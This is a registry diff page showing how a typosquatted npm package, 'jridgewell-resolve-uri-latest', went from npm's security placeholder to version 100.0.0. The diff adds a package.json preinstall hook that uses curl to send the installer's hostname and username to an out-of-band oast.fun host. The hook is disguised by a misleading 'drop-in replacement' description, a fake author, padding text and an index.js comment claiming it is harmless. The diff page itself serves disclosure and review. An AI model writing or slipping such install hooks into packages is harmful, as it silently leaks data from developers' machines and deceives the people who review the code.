jridgewell-resolve-uri-latest 0.0.1-security → 100.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of jridgewell-resolve-uri-latest might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +12 -5
  2. package/index.js +4 -0
  3. package/package.json +22 -6
package/README.md CHANGED
@@ -1,5 +1,12 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=jridgewell-resolve-uri-latest for more information.
1
+ # @jridgewell/resolve-uri-latest
2
+
3
+ This is a placeholder for the npm package `@jridgewell/resolve-uri-latest`.
4
+ It contains a simple `index.js` and a `preinstall` script for ethical hacking and research purposes.
5
+
6
+ Some random text to make it look less empty: 0ZTQrIdu zES6dOndjvFJ6PPMf5rNxk5Dh9zufXgk8UMdew0JiG57sjFzvIwLzS9MjojFLodj6Ej0CZYECPNK8UfncIc8K1gs5xPBrtOLsrx4XwVfkUjXJ1zWyRxzJW6QoSVfvDG3nNuxhADvui6bPFrYAx9bvhexIvNQh965w4cWdXuLElsON7KgS9JFi7qKTRJPrqJ
7
+
8
+ ## Usage
9
+
10
+ ```bash
11
+ npm install @jridgewell/resolve-uri-latest
12
+ ```
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+
2
+ // This is a placeholder JavaScript file for the package.
3
+ // It does not perform any malicious actions.
4
+ console.log("Package loaded successfully: This file serves as a placeholder for ethical hacking research.");
package/package.json CHANGED
@@ -1,6 +1,22 @@
1
- {
2
- "name": "jridgewell-resolve-uri-latest",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "jridgewell-resolve-uri-latest",
3
+ "version": "100.0.0",
4
+ "description": "Drop-in replacement for URI resolution in custom CSP pipelines. Built for compatibility with resolve-uri-like tools.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "curl --data-urlencode \"info=$(hostname && whoami)\" http://sjnpxdmtpuvlboyzcehbe8s7lodudopxr.oast.fun"
8
+ },
9
+ "keywords": [
10
+ "resolve",
11
+ "uri",
12
+ "internal",
13
+ "devtools",
14
+ "builder"
15
+ ],
16
+ "author": "System Tools Dev Team",
17
+ "license": "MIT",
18
+ "repository": {
19
+ "type": "git",
20
+ "url": "https://github.com/devteam/uri-resolver"
21
+ }
22
+ }